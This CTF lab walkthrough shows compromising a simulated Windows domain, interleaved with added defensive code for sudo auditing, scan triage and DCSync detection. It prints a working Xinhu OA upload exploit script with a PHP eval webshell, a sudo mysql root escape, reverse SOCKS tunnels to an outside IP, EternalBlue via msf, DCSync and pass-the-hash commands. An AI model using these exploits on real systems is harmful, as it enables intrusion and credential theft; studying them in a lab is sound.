春秋云镜:Initial
jerem1ah Lv4


https://exp10it.cn/2023/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-initial-writeup/

http://www.fzwjscj.xyz/index.php/archives/50/

https://fushuling.com/index.php/2023/08/27/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7initial/

https://fushuling.com/index.php/2023/08/20/ctfshow%e5%88%b7%e9%a2%98%e8%ae%b0%e5%bd%95%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%e4%b8%ad/ // ctfshow intranet challenges

https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/ // intranet tunnelling / proxy setup

https://github.com/shadow1ng/fscan //fscan

https://github.com/jpillora/chisel //chisel

https://github.com/ph4ntonn/Stowaway //stowaway

https://github.com/fatedier/frp //frp

https://github.com/ehang-io/nps //nps

https://github.com/AntSwordProject/antSword //antsword

https://eternallybored.org/misc/netcat //netcat

https://github.com/Lotus6/ThinkphpGUI //thinkphp

Key points:

  • ThinkPHP 5.0.23 RCE
  • privilege escalation through the mysql command under sudo
  • Xinhu OA n-day
  • MS17-010 (EternalBlue)
  • DCSync

Topology:

```
vps --- external target 1 --- Xinhu OA (win) --- EternalBlue (win) --- flag3 (win)
kali    .1.15                  .1.18               .1.21                .1.2
```

flag01

ThinkPHP 5.0.23 RCE

The error page identifies the version as ThinkPHP 5.0.23.

After getting a shell:

sudo -l

Privilege escalation through sudo mysql (the mysql client's `\!` escape runs a command as the sudo target user, here root):

```
(www-data:/var/www/html) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
```

```
sudo mysql -e '\! /bin/sh'
```
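The `sudo -l` entry above is the whole root cause of flag01: a NOPASSWD rule for a binary that can run other programs. The following Python is an added example (not part of the writeup or of any of the tools linked above): a small sudoers audit that parses `sudo -l` output and flags run-as-root entries for binaries with a built-in command escape, so the misconfiguration is found before an attacker does. The sample input is the writeup's own output plus one benign entry, constructed here; the list of shell-escape binaries is a deliberately short, hypothetical one.

```python
import re

# Constructed sample: the `sudo -l` output from this writeup plus one benign entry,
# so the audit has both a finding and a non-finding to classify.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries with a built-in way to run other commands when invoked under sudo:
# the mysql client has the "\! cmd" escape, editors and pagers have ":!cmd", etc.
# Short hypothetical list for this example; extend it from your own policy.
SHELL_ESCAPE_BINARIES = {
    "mysql", "vim", "vi", "nano", "less", "more", "man", "awk", "find",
    "perl", "python", "python3", "bash", "sh", "env",
}

# One command entry as printed by `sudo -l`: "(runas) [TAG: ...] /path/cmd [args]"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_entries(text):
    """Return the command entries listed after the 'User ... may run' line."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and " may run " in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        entries.append({
            "runas": m["runas"].split(":")[0].strip(),   # "(root : root)" -> "root"
            "tags": tags,
            "cmd": m["cmd"],
            "args": m["args"].strip(),
        })
    return entries


def risky_sudo_entries(text):
    """Flag entries whose binary can escape to a shell, or that grant ALL."""
    findings = []
    for e in parse_sudo_entries(text):
        binary = e["cmd"].rsplit("/", 1)[-1]
        if e["cmd"] == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            findings.append({
                "runas": e["runas"],
                "cmd": e["cmd"],
                "nopasswd": "NOPASSWD" in e["tags"],
                "reason": "ALL commands" if e["cmd"] == "ALL" else f"{binary} can spawn a shell",
            })
    return findings


if __name__ == "__main__":
    for f in risky_sudo_entries(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{tag}] ({f['runas']}) {f['cmd']}: {f['reason']}")
```

Run on the writeup's output it reports the `/usr/bin/mysql` rule and nothing else. The fix on the host side is to drop the rule entirely or to replace it with a wrapper script that runs the one fixed query the web user actually needs; granting the interactive client as root cannot be made safe with sudo options alone.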

Got flag01:

```
flag01: flag{60b53231-
```

Upload fscan and scan the intranet:

```
(www-data:/tmp) $ ./fscan -h 172.22.1.15/24
(www-data:/tmp) $ ./fscan -h 172.22.1.15/24 > /tmp/res.txt
(www-data:/tmp) $ cat /tmp/res.tct
cat: /tmp/res.tct: No such file or directory
(www-data:/tmp) $ cat /tmp/res.txt
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.18 is alive
(icmp) Target 172.22.1.21 is alive
[*] Icmp alive hosts len is: 4
172.22.1.2:88 open
172.22.1.18:139 open
172.22.1.15:22 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
```
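The scan result above already contains everything needed to decide what to patch first: the DC, an unpatched SMB host, an exposed MySQL port and a web PoC hit. The following Python is an added example, not part of the writeup or of fscan itself: it parses the text format fscan printed above (the `ip:port open`, `NetBios`, `MS17-010`, `WebTitle` and `PocScan` line shapes, inferred from this sample rather than from fscan's source) into a per-host inventory and ranks the findings for remediation. The sample input is an excerpt of the scan output above, embedded as a constructed string.

```python
import re
from urllib.parse import urlparse

# Excerpt of the fscan output shown in this writeup (constructed sample input).
SAMPLE_FSCAN = """\
start infoscan
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.18 is alive
(icmp) Target 172.22.1.21 is alive
172.22.1.2:88 open
172.22.1.18:139 open
172.22.1.15:22 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

# Line shapes as they appear in the output above (assumed from the sample, not from fscan's code).
ALIVE_RE = re.compile(r"^\(icmp\) Target (?P<ip>\S+) is alive$")
PORT_RE = re.compile(r"^(?P<ip>\d+\.\d+\.\d+\.\d+):(?P<port>\d+) open$")
MS17_RE = re.compile(r"^\[\+\] MS17-010 (?P<ip>\S+) \((?P<os>.*)\)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (?P<ip>\S+) (?P<dc>\[\+\] DC:)?(?P<name>\S+)\s*(?P<os>.*)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle (?P<url>\S+) code:(?P<code>\d+) len:\d+ title:(?P<title>.*)$")
POC_RE = re.compile(r"^\[\+\] PocScan (?P<url>\S+) (?P<poc>\S+)")


def _host(inv, ip):
    """Get or create the inventory record for one IP."""
    return inv.setdefault(ip, {"ports": set(), "name": None, "os": None,
                               "is_dc": False, "web": [], "vulns": []})


def parse_fscan(text):
    """Turn fscan's text output into {ip: record}."""
    inv = {}
    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE_RE.match(line):
            _host(inv, m["ip"])
        elif m := PORT_RE.match(line):
            _host(inv, m["ip"])["ports"].add(int(m["port"]))
        elif m := MS17_RE.match(line):
            h = _host(inv, m["ip"])
            h["vulns"].append("MS17-010")
            h["os"] = h["os"] or m["os"]
        elif m := NETBIOS_RE.match(line):
            h = _host(inv, m["ip"])
            h["name"], h["is_dc"] = m["name"], bool(m["dc"])
            h["os"] = m["os"] or h["os"]
        elif m := WEB_RE.match(line):
            _host(inv, urlparse(m["url"]).hostname)["web"].append((m["url"], int(m["code"]), m["title"]))
        elif m := POC_RE.match(line):
            _host(inv, urlparse(m["url"]).hostname)["vulns"].append(m["poc"])
    return inv


def triage(inv):
    """Rank hosts for remediation: (ip, severity, reason), most urgent first."""
    findings = []
    for ip, h in sorted(inv.items()):
        for v in h["vulns"]:
            findings.append((ip, "critical", f"confirmed exploitable: {v}"))
        if h["is_dc"]:
            findings.append((ip, "high", f"domain controller {h['name']}: audit 4662/4624 on it"))
        if 445 in h["ports"] and h["os"] and any(y in h["os"] for y in ("2008", "2012")):
            findings.append((ip, "medium", f"SMB reachable on end-of-life OS: {h['os']}"))
        if 3306 in h["ports"]:
            findings.append((ip, "medium", "MySQL listening on the network interface"))
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(findings, key=lambda f: (order[f[1]], f[0]))


if __name__ == "__main__":
    for ip, sev, why in triage(parse_fscan(SAMPLE_FSCAN)):
        print(f"{sev:8} {ip:14} {why}")
```

The same parser works on a full `fscan ... > res.txt` capture; feeding it the whole file instead of the excerpt only adds hosts. The ordering puts the two confirmed findings (the ThinkPHP PoC hit on .15 and MS17-010 on .21) ahead of the structural ones, which matches the order the writeup exploits them in.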

flag02

Configure the proxy.

Upload chisel with AntSword and set up a tunnel:

```
./chisel server -p 28190
./chisel client 39.105.51.11:28190 R:28191:socks

sudo vim /etc/proxychains4.conf
socks 39.105.51.11 28191
```

Xinhu OA n-day

Xinhu OA weak password: admin/admin123

RCE exploit exp.py. Contents of the uploaded file 1.php:

```php
<?=eval($_POST[1]);?>
```
exp.py:

```python
import requests

session = requests.session()

url_pre = 'http://172.22.1.18'
# login check endpoint and the public upload endpoint
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

# login form; adminuser/adminpass are base64 of the weak credentials admin / admin123
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

# 1. log in so the session cookie is accepted by the upload endpoint
r = session.post(url1, data=data1)

# 2. upload 1.php; the server stores it under a .uptemp name and returns the path and file id
with open('1.php', 'rb') as f:
    r = session.post(url2, files={'file': f})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
file_id = r.json()['id']
print(file_id)
print(filepath)

# 3. run the qcloudCos|runt task on the uploaded file id, after which it is reachable as .php
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)

# 4. call the uploaded shell
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
```
Path of the uploaded shell as printed by the script:

```
http://172.22.1.18/upload/2023-11/22_00150366.php
```

```
flag02: 2ce3-4813-87d4-
```

flag03

Configure the proxy; proxychains chains the two SOCKS listeners:

```
./chisel server -p 28190 --reverse
./chisel client 39.105.51.11:28190 R:0.0.0.0:28191:socks

./chisel server -p 1080 --reverse
start /b chisel.exe client ip:1080 R:1081:socks

sudo vim /etc/proxychains4.conf
socks 39.105.51.11 28191
socks 127.0.0.1 1081
```
Exploit EternalBlue with msf:

```
proxychains4 -f /etc/proxychains4.conf msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
run
```

Pass-the-hash

Collect credentials on the Windows machine:

```
creds_all
```

```
# DCSync with kiwi
# dump the hashes of every domain user

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
```
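From the defender's side, the DCSync above and the pass-the-hash to DC01 that follows each leave a specific trace in the domain controller's Security log. The following Python is an added example, not part of the writeup or of any tool it uses: DCSync works by asking the DC for replication, which requires the DS-Replication-Get-Changes control-access rights, so a 4662 event whose Properties contain those well-known rights GUIDs from an account that is not itself a DC is the signal; replaying the dumped hash shows up as a 4624 network logon (LogonType 3) with the NTLM package from a host administrators do not normally use. The events are constructed dicts using the Security log's EventData field names, and the two allow-lists (expected replicators, admin jump hosts) are assumptions for the example.

```python
import re

# Control-access-right GUIDs that directory replication (and therefore DCSync) needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Assumed allow-lists for this example: accounts that legitimately replicate
# (DC machine accounts, a directory-sync service account) and hosts admins log in from.
EXPECTED_REPLICATORS = {"DC01$"}
ADMIN_JUMP_HOSTS = set()

# Constructed events with the field names of the Windows Security log (EventData).
SAMPLE_EVENTS = [
    # routine replication by a DC machine account: expected
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "DC01$",
     "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # a user account asking for Get-Changes + Get-Changes-All: the DCSync pattern
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "Administrator",
     "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # unrelated directory access with no replication rights: ignored
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "alice",
     "AccessMask": "0x10",
     "Properties": "%%7685\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # NTLM network logon of Administrator to the DC from the Windows 7 host
    {"EventID": 4624, "Computer": "DC01.xiaorang.lab", "TargetUserName": "Administrator",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "172.22.1.21"},
    # Kerberos logon of the same account: not the pattern
    {"EventID": 4624, "Computer": "DC01.xiaorang.lab", "TargetUserName": "Administrator",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "172.22.1.15"},
]


def replication_rights(event):
    """Names of the replication rights present in a 4662 event's Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """4662 carrying replication rights, requested by an account not expected to replicate."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev)
        if not rights or ev.get("SubjectUserName") in expected:
            continue
        alerts.append({"rule": "dcsync", "user": ev["SubjectUserName"],
                       "rights": rights, "dc": ev.get("Computer")})
    return alerts


def detect_ntlm_admin_logon(events, privileged=("Administrator",), allowed_sources=ADMIN_JUMP_HOSTS):
    """4624 type-3 NTLM logons of privileged accounts from hosts outside the allow-list."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        if ev.get("TargetUserName") not in privileged or ev.get("IpAddress") in allowed_sources:
            continue
        alerts.append({"rule": "ntlm-admin-network-logon", "user": ev["TargetUserName"],
                       "source": ev.get("IpAddress"), "dc": ev.get("Computer")})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS) + detect_ntlm_admin_logon(SAMPLE_EVENTS):
        print(alert)
```

Two caveats for running this against a real DC: 4662 is only written when "Audit Directory Service Access" is enabled and the domain object carries a SACL for the replication rights, and the expected-replicator list must include every DC and any legitimate sync service or the rule will page on normal replication.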

```
# pass-the-hash

# pass-the-hash with crackmapexec
proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

# or psexec pth
proxychains4 -f /etc/proxychains4.conf psexec.py -dc-ip 172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG.LAB/administrator/@172.22.1.2

# or
proxychains4 -f /etc/proxychains4.conf psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codes gbk
```
```
┌──(kali㉿kali)-[~]
└─$ proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:445 ... OK
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:445 ... OK
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:135 ... OK
[proxychains] Dynamic chain ... 39.105.51.11:28191 ... 127.0.0.1:1081 ... 172.22.1.2:49668 ... OK
SMB 172.22.1.2 445 DC01 [+] Executed command
SMB 172.22.1.2 445 DC01 ___ ___
SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / //
SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / /
SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
```
```
flag03: e8f88d0d43d6}
```

```
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
```